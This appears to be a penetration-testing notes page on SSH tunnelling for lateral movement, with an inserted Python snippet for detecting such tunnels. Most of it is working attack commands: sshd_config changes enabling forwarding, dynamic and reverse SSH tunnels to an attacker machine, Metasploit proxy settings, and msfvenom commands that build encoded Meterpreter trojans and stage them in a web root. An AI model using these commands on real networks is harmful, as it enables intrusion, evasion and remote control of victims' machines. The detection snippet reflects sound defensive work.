# ssh

**Forward proxy**

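```
SSH dynamic forwarding establishes a forward, encrypted SOCKS channel.
On the target host that has outbound access, edit the config and then restart the ssh service
>vim /etc/ssh/sshd_config
AllowTcpForwarding yes      # allow TCP forwarding
GatewayPorts yes            # allow remote hosts to connect to locally forwarded ports
TCPKeepAlive yes            # keep TCP sessions alive
PasswordAuthentication yes  # password authentication
Run on the external attacking machine
>ssh -C -f -N -g -D 0.0.0.0:12138 root@<outbound target IP> -p 22
Set a global proxy in MSF, or use other software
>setg proxies socks5:0.0.0.0:12138
Machines in the isolated zone can then be attacked
```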

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/326.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/327.png)

**Reverse proxy**

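```
>vim /etc/ssh/sshd_config
AllowTcpForwarding yes      # allow TCP forwarding
GatewayPorts yes            # allow remote hosts to connect to locally forwarded ports
TCPKeepAlive yes            # keep TCP sessions alive
PasswordAuthentication yes  # password authentication
ClientAliveInterval         # change to 30-60 to keep the connection alive
ClientAliveCountMax         # uncomment; number of unanswered requests before automatic disconnect
107 (192.168.0.107) is the external attacking machine
Run on the internal target host:
>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
```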

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/328.png)

```
Run on the attacking machine
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/329.png)

```
The tunnel is established; configure proxy software with the attacking machine's external IP:12345 to access the internal network
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/330.png)
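For monitoring, the `ssh` invocations above can be recognized from process command lines. The following is an added example, not part of the original notes: it walks `ssh` arguments the way getopt does, so bundled clusters such as `-qngfNTR` and options placed after the host are handled, and `sshd -D` is not mistaken for a forward. The option set, the function names and the sample lines (including 203.0.113.10 and 10.0.0.5) are assumptions constructed for illustration.

```python
import shlex

# Assumption: short options that take an argument, per the ssh(1) synopsis; check your OpenSSH version.
TAKES_ARG = set("BbcDEeFIiJLlmOopQRSWw")
FORWARD = {"D": "dynamic", "R": "remote", "L": "local"}

def ssh_forwards(cmdline):
    """Return None if cmdline is not ssh, else its forwards, flag letters and destination."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    out = {"forwards": [], "flags": set(), "dest": None}
    args = iter(argv[1:])
    for tok in args:
        if not tok.startswith("-") or tok == "-":
            if out["dest"] is not None:
                break                  # second bare word: the remote command starts here
            out["dest"] = tok          # ssh keeps parsing options after the host
            continue
        for j, opt in enumerate(tok[1:], start=2):   # walk a cluster such as -qngfNTR
            if opt not in TAKES_ARG:
                out["flags"].add(opt)
                continue
            arg = tok[j:] or next(args, "")          # glued (-D12345) or next argv element
            if opt in FORWARD:
                out["forwards"].append((FORWARD[opt], arg))
            break
    return out

def alert(cmdline):
    """Flag tunnel-only sessions: at least one forward together with -N."""
    r = ssh_forwards(cmdline)
    return bool(r and r["forwards"] and "N" in r["flags"])

# Constructed process-list sample; the ssh lines mirror the command forms on this page.
SAMPLE = [
    "ssh -C -f -N -g -D 0.0.0.0:12138 root@203.0.113.10 -p 22",
    "ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107",
    "ssh -p 12138 -qngfNTD 12345 root@192.168.0.107",
    "ssh -N -R 12138:10.0.0.5:12138 root@203.0.113.10",
    "ssh admin@10.0.0.8 uptime -p",
    "/usr/sbin/sshd -D",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(alert(line), ssh_forwards(line))
```

The `g` flag and the bind address in each forward specification show whether the listener is reachable from other hosts, which is worth including in the alert text.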

**SSH tunnel + RC4 double encryption**

```
Generate the trojan
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF settings
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/331.png)

**Public SSH tunnel + local MSF**

```
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '\x00' LHOST=<public IP> LPORT=12138 -f exe -o /var/www/html/1.exe
The handler listens on the local IP:12138
SSH forwarding
>ssh -N -R 12138:<local internal IP>:12138 root@<public IP>
```

